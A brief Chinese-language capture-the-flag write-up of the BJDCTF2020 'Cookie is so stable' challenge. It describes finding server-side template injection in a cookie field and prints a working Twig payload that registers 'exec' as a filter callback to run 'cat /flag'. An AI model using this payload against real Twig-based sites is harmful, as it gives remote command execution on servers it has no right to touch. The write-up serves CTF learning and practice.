[BJDCTF2020]Cookie is so stable
打开题目,发现了一个表单在hint.php的页面源代码中发现一行注释,根据提示,cookie可能可以被我们利用
抓包后发现cookie中存在一个user,输入{{4*4}},页面直接返回了结果,说明这里存在SSTI模板注入
经过测试,这里可能为twing模板,使用payload进行命令执行{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};